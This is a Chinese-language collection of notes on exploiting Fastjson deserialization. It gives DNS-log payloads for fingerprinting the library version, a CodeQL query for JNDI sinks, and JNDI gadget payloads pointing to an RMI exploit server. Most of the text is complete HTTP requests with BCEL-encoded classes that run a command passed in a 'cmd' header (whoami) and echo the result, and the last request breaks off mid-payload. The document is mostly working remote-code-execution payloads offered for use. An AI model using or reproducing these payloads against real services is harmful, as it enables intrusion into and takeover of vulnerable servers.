Fastjson姿势技巧集合
高版本的一些细节还有待更新。本项目涉及的一些姿势和payload是从之前的随手记的笔记直接粘进来的,很多找不到出处了所以来源未贴出来,忘师傅们见谅。
学完后应该能回答如下问题。
- parse 和 parseObject的区别
- 主要exp有哪几种
- 不出网怎么利用
- templatesimpl为什么鸡肋
- 高版本jdk bcel为什么失败
- 1.2.48通杀exp原理是什么
- 如何突破parse不能调用所有getters方法的限制
- 1.2.68绕过原理是什么
用来探测目标版本,才能更好确定使用的payload。还可以用来区分fastjson和Jackjson。
fastjson探测版本,还可以用错误格式的json发过去。如果对方异常未处理可报出详细版本。
主要是利用各个类被加入黑名单的方式进行判断
原理重点关注MiscCodec处理时会去nwe URL,然后通过后面的map#put触发计算key的hash。学习urldns链容易理解。
fastjson >1.2.43
{"@type":"java.net.URL","val":"http://dnslog"}
{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}fastjson >1.2.48
{"@type":"java.net.InetAddress","val":"dnslog"}fastjson >1.2.68
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
Set[{"@type":"java.net.URL","val":"http://dnslog"}]
Set[{"@type":"java.net.URL","val":"http://dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{{"@type":"java.net.URL","val":"http://dnslog"}:0精确探索 https://github.com/pen4uin/awesome-java-security/tree/main/alibaba%20fastjson
[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]
https://xz.aliyun.com/t/7482
https://xz.aliyun.com/t/7789#toc-4
主要用codeql进行挖掘
/** @kind path-problem */ import java import semmle.code.java.dataflow.FlowSources import semmle.code.java.dataflow.TaintTracking2 import DataFlow2::PathGraph class JNDIMethod extends Method{ JNDIMethod(){ this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and this.hasName("lookup") } } class MyTaintTrackingConfiguration extends TaintTracking2::Configuration { MyTaintTrackingConfiguration() { this = "MyTaintTrackingConfiguration" } override predicate isSource(DataFlow::Node source) { exists(FieldAccess fac| source.asExpr() = fac ) } override predicate isSink(DataFlow::Node sink) { exists(MethodAccess call | call.getMethod() instanceof JNDIMethod and sink.asExpr() = call.getArgument(0) ) } } from MyTaintTrackingConfiguration config, DataFlow2::PathNode source, DataFlow2::PathNode sink where config.hasFlowPath(source, sink) select source.getNode(), source, sink, sink.getNode()
除了考虑Fastjson版本,还得考虑JDK版本,中间件版本,第三方依赖版本。
JDK版本对于JDNI注入的限制,基于RMI利用的JDK版本<=6u141、7u131、8u121,基于LDAP利用的JDK版本<=6u211、7u201、8u191。(更高版本也有绕过)
更高版本绕过可用https://github.com/veracode-research/rogue-jndi
- jndi
- JdbcRowSetImpl
- C3p0#JndiRefForwardingDataSource
- JndiDataSourceFactory
- bcel
- tomcat#dbcp
- ibatis
- TemplatesImpl
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName", "autoCommit":true}JdbcRowSetImpl无法成功可以一试
{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName", "loginTimeout":0}{"@type":"org.apache.shiro.jndi.JndiObjectFactory", "resourceName":"rmi://127.0.0.1:9050/exploit"}{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":"rmi://127.0.0.1:9050/exploit"}可用于解决不出网利用。 需要注意在Java 8u251以后,bcel类被删除。
tomcat7
org.apache.tomcat.dbcp.dbcp.BasicDataSource
tomcat8及其以后
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
Poc
{
{
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$l8ドルb$I$A$..."
}
}: "x"
}exp
执行命令回显.
POST /json HTTP/1.1 Host: 127.0.0.1:9092 Content-Type: application/json cmd: whoami Content-Length: 3327 { { "@type": "com.alibaba.fastjson.JSONObject", "x":{ "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName": "$$BCEL$$$l8ドルb$I$A$A$A$A$A$A$A8ドルdV$cb5ドルb$TW$U$ff5ドルdH27$c3$m$g40ドル$Z$d1$wX5$a0$q7ドルd$d8V81ドルZi$c4b$F$b4F$a5$f8j$t$c385ドル$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea7ドルfP7ドルbnf$C89ドル$d0$afeq$ee$bd$e7$fe$ce$ebw$ce9ドルd$f0$cb$df3ドルf3ドルe$Ap$I$df$aaHbX$c5$IF$a5x9ドルe$e3$a88ドルa$Xp8ドルccL$c18ドルb$w$U$e4$U$iW18ドルe$T$i$_qLp9ドルc$e4x99ドル$e394ドル$bc9ドルb$e498ドル$e298ドルVpZ$o$cep$bc$c2qVE$k$e7Tt$e23ドルc$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f19ドルa$U$af$ab0PP$b1$h$s$c79ドルc5ドルc85ドル$U$f3$i$L$iE$F96ドル82ドルE86ドル$c4$a8$e5X$c1Q86ドル$d6$f4$c0$F86ドルX$ce9ドルd$T$M$j93ドル96ドル$p$a6$x$a582ドル$f0$ce$Z$F9ドルb47ドルc$d4$b4$pd7ドルb3ドルe0$cc$a5$v$a35ドルc$bb$a2j$U$yQ$z94ドル$ac$C9ドルb$fc2$a8y$b7$e299ドル$e284ドル$r$z3ドルb$f2e$cfr$W$c6$cd$a29ドルbY496ドル$N$N$H1$a4$a0$a4$c181ドル$ab$a18ドルck$M$a3$ae$b790ドル$f1k$b8y$cf$u89ドル$eb$ae$b794ドル$b9$$$K$Z$d3u$C$b1$Sd3ドルcq$ad$o$fc$ms65ドルcs$a1z$c2$b5$e784ドル$a7$c0$d3$e0$p60ドル$e8Z$QA84ドル$Y$L$C$cf$wT$C$e1S$G2l$d669ドルc85ドルl$ce67ドルc_C$F$cb$M9ドルb$d7$d4$a7$L8ドルb$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e693ドル$X$de$b2$bda$d0$b6Z$$7ドルe$d9u7ドルc$oA5ドルd$cb8ドルca$a7$M$bc92ドル$f1C$db5$lup92ドル$c039ドルe$V$I$aa$eb86ドル$ccto$b3A1$I$ca99ドル$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY88ドル867ドル$f0$s$f5$d9$y$cd1$u$ae9ドルfq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D86ドル96ドル$acI$b0l$c1r$b27ドルe91ドル8ドルeC$a686ドル$P$f1$R$e9$q$z81ドル$ed0l$a985ドル$a8$E96ドル9ドルd$cd9ドルb86ドル$e3$c8V7ドルc$ac$e1$T7ドルc$aa$e137ドルc$ae$e0$a686ドル$_$f0$a5l$f8W$e4$e1$f298ドル86ドル$af$f18ドルd86ドル5ドルb2T7ドルc$de$aeH$c7q$d3ve$d19ドルdk$f98ドルe$af98ドル$a2$iX$$85ドル$e85$ddRv$de$f083ドルE$dfu$b2$cb$V8ドルa$b43ドルaM$M3ドルdk69ドルe98ドル$b7$a985ドル$d9$v$R$U5ドルd$w$b0$f3$d2$e4$a3$E8ドルc491ドルr$ae$e8$RS4$cdf$c5$f384ドル$T$d4$cf5ドルd$e981ドル$c9GQd$d9M$d4FSW9ドルb$a1I7$a4Yo827ドル5ドルcI9ドルb$N$_$a8M6mj$gjmz7ドルd9ドルe$eb3ドルc8ドルe84ドル$ad$ad$d7vl$D9ドルbK$ebl$g$bd4$b3C$ee$S96ドル$b3$ec$$$R$edG$g7ドルd85ドル$cf$a0$c9W$a4$gX$af$a2$feSN$c785ドルi$h9ドルe98ドル$ab$e7$d6$ee8ドルb60ドル$cc485ドル$ef5ドルb$b5$efF$y7ドルdQ7ドルeW$g$a7$f186ドル$l88ドルR$f840ドル$cexnYx$c1$N86ドル7ドルd$ff$c1$c3j$L$db$C$f77ドルc99ドル8ドルcr86ドル9ドルc9ドルa$e6n$ad82ドル$b87ドルc$a786ドル$e5$Q$c1$bd8ドルd8ドルesE$c3$cb$cb$d7$e298ドルbd$e0$o$Be5ドルb$c3Nt$ae$ef$e4H7ドルd$c6k$aa$b3$V$t$b0J$f5$c75ドルc3ドルft799ドルEj28ドルc89ドル$VA$_$u9ドルd$de60ドル$Q$h$z88ドル$C$c9Vs$a8H$c9$b089ドルB9ドルdt$ca95ドル80ドル$y85ドルA$acm$ab87ドル$b3$dcl$c3$F99ドル$f7$a47$bc90ドル$eck$V_$i$X$b6U92ドル$df$U86ドル$fd$ff$ceu$e3c96ドルE84$ef$e8$c3$B$fa7ドルd91ドル7ドルf$z60ドル$f2$ebM2C$a79ドルd$b42Z$e383ドルw$c1$ee$d086ドル$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa88ドル9ドルf$gL$rZ$efC$a982ドルO$k60ドル$b4KV$a1NE80ドル$b6$Q$a0$d5$B83ドル$a9$f6h3ドルb7ドルd$e060ドル84ドル$j8ドルe$N$adn$e391ドル$dd$s$b2Ku84ドル$d0$cd$c389ドルH$bbEjS1$d2$ce$b6$a63ドルa$f3$f2J$d1$VJ$a2KO84ドルR8ドルf$d53ドルdq5ドルd$d1$e3$EM$S$b49ドルb$a0$ea$cf$e8$iN$s$ee93ドルTS5ドルb$efa5ドルb$V3ドルd$v$bd8ドルa$ed$df$p$a5$ab$S$a3$ab$b1To$fe63ドルa$e4qG$ed$b893ドルd5ドルcO$e6u5ドルe$c5c$a95ドルd8ドルd91ドルu$k3ドルa$ff$J$bbg$ef$a1OW$ab$e8$afb$cf5ドルd3ドルc9ドルe$da5ドルb$c5$be$w$f6$cb$a03$a1e3ドルa$aaD$e7Qz91ドル7ドルe60ドル9ドルd$fe6b$a7$eeH$e6$d9$y$bb8ドルcAj95ドル$ec85ドル83ドル5ドルe92ドルIhP$b18ドルd3ドルa$d0G$bb$n$b4$e306$n87ドル$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC77ドルe$c0VP$a9x80ドル$k$fc$K$j$bfa3ドルb7ドルe$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a588ドル7ドルb$d8$V$ec$c793ドル$U$edY$c4$k$S$b8M$c1S$K9ドルeVp$a8$$$c3M$b87ドルfF$n$i$da$k$c293ドルs$a3$e0993ドルd87ドルk$pv$e4$l3ドルeQL40ドルE$J$A$A" } }: "x" }
POST /json HTTP/1.1 Host: 127.0.0.1:9092 Content-Type: application/json cmd: ver && echo fastjson Content-Length: 3327 { { "@type": "com.alibaba.fastjson.JSONObject", "x":{ "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName": "$$BCEL$$$l8ドルb$I$A$A$A$A$A$A$A95ドルW$Jx$Ug$Z7ドルe$t$bb9ドルb99ドルL$s90ドル$y$y$n$Jm9K$Sr$ARZ$S$K84ドル40ドル$m92ドル84ドル98ドル$NP$O95ドル$c9dH$W63ドルbav96ドル40ドル$ab$b6JZ5ドルb$LZ$Lj9$d4$Kj3ドルc$f0$m$d1$r82ドルE$bc82ドル$d6$fb3ドルe$aax$l$f5$be8ドルb8ドルfJ7ドルd$ff99ドル$Nn$c896ドル3ドルc3ドルe$cf$ce7ドルf7ドルe$ffw$be$df$f7$ff$fb$f4$b5$f3$X$B$y$c1U$V$c5x$m$H$ab$f1j$d1$bcF$c6A$V7ドルeo$a5_4$P$wxH$c5k$f1$b098ドル3ドルc$a2$e0u$a27ドルfT$c6$n$Vy8$ac$e2$f5x83ドル$ca95ドル$c7$c4$a978ドルa$e6q13ドルd$o$d8$kUQ887ドル$vx$b38ドルc$b7$c8xB$cc8ドルe$c98$ae$a0I$c5$J9ドルc$U8ドルc$de$aa$a0C$c6$dbd$bc5ドルd$c5L$i96ドル$f1$a48ドルa$d9$a27ドルf87ドル8ドルa$b98$ac$e094ドル8ドルa$d3x$a78ドルa$e9x97ドル82ドルw8ドルb7ドルe40ドル$c17ドルb$U$bcW$c1$fbd$bc_$c6$Z$V$l$c0$HE$f3$n$V$l$c6Y$V$d5$YT0$q$fa8ドルf88ドル$e6$a3$w$aa90ドル$U$cd9$d1$M$L53ドルe$a6$e23ドルc$$88ドル$e6$e3b$fa94ドルP$f9$a28ドルcO88ドル$c9$ra$d3$te7ドルcJ82ドル$d4$zaJ$d3n7ドルd9ドルf5ドルe9ドルdp$o$d1$ea$f5z$bc3ドルbl3ドルa$b5$Sr$c291ドル$ae98ドル$ee$qlS$c2$fc$f1$U$cb$bd$a5$a8$k$eb$aa$de$d8$b1$db49ドルc$da$V3ドルc95ドルeD$r$U$a6$ed$d5G$f5x$bc$c9$d23ドルbM9ドルb$db$be$ee$b8$z$a1$e0$c67ドルdo$a797ドル$ad$d1$d3$v$n98ドル$b6$lv$ecH$ac8ドルb$E92ドル3ドルdv$p$r94ドル$h3ドルc97ドル$bd3ドルc$S8ドルb8$x$c8$a0$b4l$b3$E7ドルf$bd$d5I$b5$t7EbfK$a2$a7$c3$b4$db$f58ドルe$a8$v$YX86ドル$k$dd$ac$db$R1O$zJ$fcf$df$a8R8ドルb$e54X89ドルX$e7$da$fd86ドル$d9$ebD$ac$Y$r$f99ドルd$eeH5ドルc$c29ドルc$a6x$a2$a7$c7$b4$e3$a6Qm$g$ddVu$bd$Vsl$x$g5$ed$ea$baht$z97ドルH9ドルc$XvtcO$b3$de$ebJ$a1$b3$J$u$ca8ドルaH$I95ドル8ドルe7$a3l$hu$b73ドルavK$c8o69ドルdn$ab$b3U$b7$f5$k$d3$a1$U$J$d32$ih$Uv$e6v99ドルN9ドルb$Z$ef$b5bq$daP9ドルcFe9ドルb$bb$a2$q$ab$f698ドルQ9ドルdP$daf$baM$e9867ドル$d284ドル$$3ドルdZg$Yf3ドルc9ドルeNT99ドル81ドルscl$l7ドルd$v$I$dau9ドルbz$a4$d3$cfJ$a3o$b1$c2$J$a3$db$d3$p9ドルd$s$d7$e8$d6$e9B$a785ドルf$S7$bd7ドルd$d7u8ドルcX$d5$ad$M$ba$b3$c58ドルe8$$j$qKB$a093ドル$t$JV$a9$d1K$s$e6$RS889ドル$c7$a5$G7ドルe7ドルb$e9$f1N$d388ドル$ea$b6$d9$d9$Q1$a384ドルQQ$G$ad$dd$z$b2$M$c4$j$ddvx$$$e6f$ee$a7e7ドルc86ドルy$xAYnDSPR$c3V$c26$cc86ドル88ドル$c088ドル96ドル$Kl95ドル60ドル$a9$e1$rh$d3$d082ドル8ドルd$gZ$b191ドル80ドル$k97ドル$k$g$ea$b1F$c33ドルa$ac970ドルO$ec$ee$af8ドルa9ドルb$f6$be$a8$e9Tu3ドルbNo$d5z6ao$a1$cd$dc9ドルb0$e38ドルe8ドルc$cfj$Y$c1e$N8ドルdx$b184ドル$db$t3ドルa$e4E5ドルd$c3$GA3ドルds$o$f4j$f8$i$dad7ドルc5ドルe$c3$d3$f882ドル868ドルh$c4$X$f12$N_$S$cdKE$f3e7ドルcE$c3W$f15$a63ドルe$c3$b9$de$U$v$cb$i$ba813ドル$Bzcrj$f83ドルa$be1f$dd$c3$a88ドルcoj$f8$W$be$ad$a1$J$cd$y3$Z$A8F$f3$cc$f093ドル$b0$e0$ff$A9ドルf84ドル$db$s80ドル9ドルe$E$d98ドルaW$c588ドル3ドルa$Z$df$d1$f05ドルd7ドルcO$c3$f7$f1$MkH_$q$d6i$f5$J$bf$fc80ドル$c9$b8n$f5$G$c2dS7ドルbC$e55ドルd9ドルeG3ドルc88ドルe$da1$W$a4c$m$Q6$f4X$cc$b4e$fcP$c3$V$fcH$c38ドルf$f1$T$Z3ドルf$d5$f03$fc5ドルc40ドル$e7$X84ドル$fb8ドルe3ドルa$N$bf$c4$af4$fc$g$cfhx$W$bf$d1$f05ドルb81ドル$a9$df89ドル$e6$f7$f8$D$f1$a8$e18ドルf$f893ドル86ドル3ドルf$e3$_$g$fe8ドルa$bf$J$a8$e994ドル$be7ドルd7ドルc$z$d0$f0w$R$bb7ドルf$e09$a6$de84ドル$b589ドル85ドルb$fbM2$a3$f0$F$b698ドル9ドルe$Z$ab3ドルa9ドルd$T$e5$m$F8ドルey$a5$e3kwY86ドルr3ドルf$b9W8$cf$z91ドル$ed$b6n98ドルc$e0$d3$dem$T7ドルdLh$pa$dbf$cc$Z9ドルdO$zMg$e5$ad92ドル97ドルb$d0F3ドルd$S$a3x9ドルf$deI3ドルa85ドル$d1J$e93$a5493ドル$f4$fcH$bc$$$k$X$f7$hKs83ドルm$f5$I$de$e3$e8DM$W81ドル$f7$A$qaU$G$db$b68ドルf3ドルfu$b3$w3ドルc$fd85ドル$f6$I$bf$I1$bd87ドル8ドルeX96ドル$a1$dag$IzY$a6$bb03ドルd7$P$c4$j$b3$c7$bb$pZm$ab$d7$b49ドルd$D$y$x$T$c4$e7$fau9ドルb$ebXMV9ドルfi$d7$eb$e2j$Z$eb$f9$ebD$rc9ドルc$c6z$k$W$b5$yf98ドル$ae$ef$K$fe$b7$d796ドル889ドル$RQ$e7Uqc8ドルdNBc$b8$a696ドル$c53ドルdk$ee7$N$be3ドルa$s$d095ドルV89ドルJQ3ドルbFRjQ$c2$qJj8ドルc$f5$s$I2$e284ドル8ドルe$u$i95ドル$c6$d4M$db$e0$f1$f2$d28ドルc$h$Z$a4$f3$ce$d5$Sqs8ドルd$Z8ドルd$f4xy7ドルf$T$r$d38ドルb81ドル$b0$wf$ee$e78ドルd$p$bb$c88ドルf$c6nx$H$a4I$I$ec8ドルa$s$e2$bc$ea$CF$d4$S$ce$_$a0$rk$d2$af6Z7$a3$b4$ecfI9ドルc$c78ドルb$d5$ab$a3$R$f789ドル$e3$_$dd$s8$fb$c8$e9$G$M$dc$MM2$d3$c4$b6$f5$D$ee$b38ドルa$B$cd$e3$f1p82ドルH2$bc$e4$K89ドル3ドルcc$ee$d1$ae1$F$a1h7ドルc$d2$a55ドルe80ドル98ドル$c5gh19ドルf$e52$UqCB$c2Z$ce$b2$d0$c09$_K8ドルe$Vq$ff$b9$fd86ドルT$cf$db$c3$edy$df$ba7ドルd$ab$db$Hx96ドル$d70$db0gI$f2$c8b$bf$bc$fc$i$qi$IY$fc7ドルc$X$e0$dfz$O81ドル$nd$PB$O$wI$e4$MA$V$c35ドルcw$a8$N40ドルiZ90ドル$c4$a4aL$f6$N$p$ff$yyMC$F$l$d4y$f0$a19ドルd$dc$aa90ドル$cbv29ドルf$fc$F94ドル$h84ドル86ドル$v$a4$I$d1$KAWD$caB$y$e483ドル7ドルd$JJP8ドルb$Z$d8D$eai$d4c$nOl$c6$W$f2$a3F$b8$H5ドルb$d9o$e397ドル8ドルf$ac$e7yH92ドル$b15ドルd43ドルb$fcP$c5$dd$cb$Ta97ドル$o$cb3ドルdQ5ドルc3ドルe82ドル$bcAd97ドル$tQp$M$B$ff$Zo$i$dc$e23ドルb$c35ドルdO$b3$m$r$A$b7a$S$ffS$e4c$Ou98ドル$ebJ$d73ドルc$Ox$b9$eb$p$n$d38ドルf$acI$Sv$K8ドルfI5ドルc$GE$f2$o$f1Df3ドルd82ドルl$c1H$aa$y$c9_r$g93ドル$H915ドル$o3ドルc$e4$h81ドル$ffl$f90$a6$i97ドルB5ドルc$bb8ドルc87ドル$G$a1R85ドル$a9I84ドル8ドルe$e1409ドル$fd$cb85ドル$e04$ffS$u$dc$ea$LN$P$tQT$ceI1$t$r9ドルc$cc$b884ドル$e9C$b8e$Q$b75ドルc86ドル$w$a21802ドル$f2$n83ドル$e0$ad3ドルe9ドルe$nys$F$X8$$$s5C$c5P47ドルb84ドル8ドルb9ドルb$x92ドル985ドル80ドルr$d1$cf$Z$c0l$d1$cf$h401ドル$d5$ba8ドルc$a983ドル$d0$ae$x$oS$R9ドルf$abs$b7$absG$f0$f6a$ccO$a24X96ドルD$f91$u$c1$F$D$I$E$x9ドルay$uX99ドル$SL$ca94ドル$d8K$a8j$a9$bc80ドル$ea$ad$c3XHU93ドルX94ドル$c4$e28ドルasxQpI$Sw$q$b1489ドル3ドルb$x93ドル$b88ドルb$df$b2$B$f89ドルb$cf96ドル97ドル$f8w$ba8$J$a0$D$P$e0$m$fd$bf$I$P$e3Q$c640ドル$f4G$f8$bfN$f4$t$Y8ドルb$Ri$a6487ドル$fb5ドルe$b4$k$e7$K09ドルfQ$x$r82ドル$ca$Z9ドルf$F$a8$q82ドル$W$R$M9ドルb88ドル96ドル$ed$iu$e0$O$d8XJ$be$b5$e47ドルc$t$fa$b18ドルc$bc$ea$c9$fdn$i$c2$K3ドルc$c6$f1$R$ac$c4Q$ac$c2$T$i9ドルf40ドル$jN29ドルb9ドルe$e4$f84$b3$u$c9$i3ドルa$cf8ドルc$Za$be5ドルca$c65ドルcE8ドルb49ドルd8ドルf$d3$Zh95ドルf$oLm$da$a4$b9h97ドル$e6a8ドルbTAD$K$b4$ec40ドル$OeN$a2l83ドル80ドル$e8wQ$db$c9$d1$nwdrt$d4$j$ed$e2$e8$a43ドルb$ea$e2$e8$K$a5vSB$We94ドル$o82ドル$dd$b492ドル$Q$c2$k$Xsb$UE$Pq$u$d0W8ドルa$fc$m$fe85ドル96ドル9ドルd2b$fe$d52$acu2z$f9$ed95ドル$a7$cd$ac93ドルa3ドルf87ドル$b5$dc$Ba$u$Q9ドルa93ドルE$s$e0q81ドル$d2$f8$uJ$a57ドルb$d8k5ドルc$eb$X91ドル$Xp$a8i$a9$bc$b8$d4$ef5ドルb$g$I$FB$feS0$xC81ドル$c55$d9E$d9$fe$qj$a5$g$b9H$a4$cbr$f6$b28ドルb94ドル$bb8ドルfC$x92ドルK86ドル$b1b$A$d5E$f2$r$ac$e4$afF$vR$$$$$cd$f1$zUCj$u$e7$U$a6$V$v$nuqMnQ$ae$m$ecW$a581ドル$e79ドルf$rxj94ドル$fe$A87ドル$c7$vt$d5$d6$e6$cb$cf3ドルf$u8ドルa$c47ドルcXt$dbhpW3$B85ドル$x$DL$e45ドルb99ドルasi$ca7ドルc$ba$b49ドルa$ae$ac$a1$T$eb$e9483ドル$O8ドルb$b0$b7h$abM$e78$a4$bd$X7ドルbq$lg$H9$T$c1XA$t$Y$fc$i$ba197ドル$i9ドルa5ドルd87ドル$ca$e4$b9$Z$J$ec$e3$O3ドルd80ドル3ドルe$cf$c9$iyN$O$e07ドルe$ecg$d8$b35ドルcwWA$f97$C2$O5ドルcC$ae8ドルc7ドルb$r$e93ドルfX$q$e33ドルe$Z$af$b886ドル$C$Z$x$r$e9$w8ドルa$Y86ドル$d83ドルf$c1Q60ドル$d4$e97ドルd$v$a7$xx$e5$f58ドルa3ドルa$db$ad$q$M$E$abc$SuC90ドル$cf8ドルa$e0$ba$sg$bb7ドルb$K$dbW$b9$d5$fb$fe$ff$Ctz$ebem$R$A$A" } }: "x" }
POST /json HTTP/1.1 Host: 127.0.0.1:9092 Content-Type: application/json cmd: whoami Content-Length: 3647 { "xx": { "@type" : "java.lang.Class", "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" }, "x" : { "name": { "@type" : "java.lang.Class", "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" }, { "@type":"com.alibaba.fastjson.JSONObject", "c": { "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName":"$$BCEL$$$l8ドルb$I$A$A$A$A$A$A$A8ドルdV$cb5ドルb$TW$U$ff5ドルdH27$c3$m$g40ドル$Z$d1$wX5$a0$q7ドルd$d8V81ドルZi$c4b$F$b4F$a5$f8j$t$c385ドル$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea7ドルfP7ドルbnf$C89ドル$d0$afeq$ee$bd$e7$fe$ce$ebw$ce9ドルd$f0$cb$df3ドルf3ドルe$Ap$I$df$aaHbX$c5$IF$a5x9ドルe$e3$a88ドルa$Xp8ドルccL$c18ドルb$w$U$e4$U$iW18ドルe$T$i$_qLp9ドルc$e4x99ドル$e394ドル$bc9ドルb$e498ドル$e298ドルVpZ$o$cep$bc$c2qVE$k$e7Tt$e23ドルc$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f19ドルa$U$af$ab0PP$b1$h$s$c79ドルc5ドルc85ドル$U$f3$i$L$iE$F96ドル82ドルE86ドル$c4$a8$e5X$c1Q86ドル$d6$f4$c0$F86ドルX$ce9ドルd$T$M$j93ドル96ドル$p$a6$x$a582ドル$f0$ce$Z$F9ドルb47ドルc$d4$b4$pd7ドルb3ドルe0$cc$a5$v$a35ドルc$bb$a2j$U$yQ$z94ドル$ac$C9ドルb$fc2$a8y$b7$e299ドル$e284ドル$r$z3ドルb$f2e$cfr$W$c6$cd$a29ドルbY496ドル$N$N$H1$a4$a0$a4$c181ドル$ab$a18ドルck$M$a3$ae$b790ドル$f1k$b8y$cf$u89ドル$eb$ae$b794ドル$b9$$$K$Z$d3u$C$b1$Sd3ドルcq$ad$o$fc$ms65ドルcs$a1z$c2$b5$e784ドル$a7$c0$d3$e0$p60ドル$e8Z$QA84ドル$Y$L$C$cf$wT$C$e1S$G2l$d669ドルc85ドルl$ce67ドルc_C$F$cb$M9ドルb$d7$d4$a7$L8ドルb$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e693ドル$X$de$b2$bda$d0$b6Z$$7ドルe$d9u7ドルc$oA5ドルd$cb8ドルca$a7$M$bc92ドル$f1C$db5$lup92ドル$c039ドルe$V$I$aa$eb86ドル$ccto$b3A1$I$ca99ドル$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY88ドル867ドル$f0$s$f5$d9$y$cd1$u$ae9ドルfq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D86ドル96ドル$acI$b0l$c1r$b27ドルe91ドル8ドルeC$a686ドル$P$f1$R$e9$q$z81ドル$ed0l$a985ドル$a8$E96ドル9ドルd$cd9ドルb86ドル$e3$c8V7ドルc$ac$e1$T7ドルc$aa$e137ドルc$ae$e0$a686ドル$_$f0$a5l$f8W$e4$e1$f298ドル86ドル$af$f18ドルd86ドル5ドルb2T7ドルc$de$aeH$c7q$d3ve$d19ドルdk$f98ドルe$af98ドル$a2$iX$$85ドル$e85$ddRv$de$f083ドルE$dfu$b2$cb$V8ドルa$b43ドルaM$M3ドルdk69ドルe98ドル$b7$a985ドル$d9$v$R$U5ドルd$w$b0$f3$d2$e4$a3$E8ドルc491ドルr$ae$e8$RS4$cdf$c5$f384ドル$T$d4$cf5ドルd$e981ドル$c9GQd$d9M$d4FSW9ドルb$a1I7$a4Yo827ドル5ドルcI9ドルb$N$_$a8M6mj$gjmz7ドルd9ドルe$eb3ドルc8ドルe84ドル$ad$ad$d7vl$D9ドルbK$ebl$g$bd4$b3C$ee$S96ドル$b3$ec$$$R$edG$g7ドルd85ドル$cf$a0$c9W$a4$gX$af$a2$feSN$c785ドルi$h9ドルe98ドル$ab$e7$d6$ee8ドルb60ドル$cc485ドル$ef5ドルb$b5$efF$y7ドルdQ7ドルeW$g$a7$f186ドル$l88ドルR$f840ドル$cexnYx$c1$N86ドル7ドルd$ff$c1$c3j$L$db$C$f77ドルc99ドル8ドルcr86ドル9ドルc9ドルa$e6n$ad82ドル$b87ドルc$a786ドル$e5$Q$c1$bd8ドルd8ドルesE$c3$cb$cb$d7$e298ドルbd$e0$o$Be5ドルb$c3Nt$ae$ef$e4H7ドルd$c6k$aa$b3$V$t$b0J$f5$c75ドルc3ドルft799ドルEj28ドルc89ドル$VA$_$u9ドルd$de60ドル$Q$h$z88ドル$C$c9Vs$a8H$c9$b089ドルB9ドルdt$ca95ドル80ドル$y85ドルA$acm$ab87ドル$b3$dcl$c3$F99ドル$f7$a47$bc90ドル$eck$V_$i$X$b6U92ドル$df$U86ドル$fd$ff$ceu$e3c96ドルE84$ef$e8$c3$B$fa7ドルd91ドル7ドルf$z60ドル$f2$ebM2C$a79ドルd$b42Z$e383ドルw$c1$ee$d086ドル$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa88ドル9ドルf$gL$rZ$efC$a982ドルO$k60ドル$b4KV$a1NE80ドル$b6$Q$a0$d5$B83ドル$a9$f6h3ドルb7ドルd$e060ドル84ドル$j8ドルe$N$adn$e391ドル$dd$s$b2Ku84ドル$d0$cd$c389ドルH$bbEjS1$d2$ce$b6$a63ドルa$f3$f2J$d1$VJ$a2KO84ドルR8ドルf$d53ドルdq5ドルd$d1$e3$EM$S$b49ドルb$a0$ea$cf$e8$iN$s$ee93ドルTS5ドルb$efa5ドルb$V3ドルd$v$bd8ドルa$ed$df$p$a5$ab$S$a3$ab$b1To$fe63ドルa$e4qG$ed$b893ドルd5ドルcO$e6u5ドルe$c5c$a95ドルd8ドルd91ドルu$k3ドルa$ff$J$bbg$ef$a1OW$ab$e8$afb$cf5ドルd3ドルc9ドルe$da5ドルb$c5$be$w$f6$cb$a03$a1e3ドルa$aaD$e7Qz91ドル7ドルe60ドル9ドルd$fe6b$a7$eeH$e6$d9$y$bb8ドルcAj95ドル$ec85ドル83ドル5ドルe92ドルIhP$b18ドルd3ドルa$d0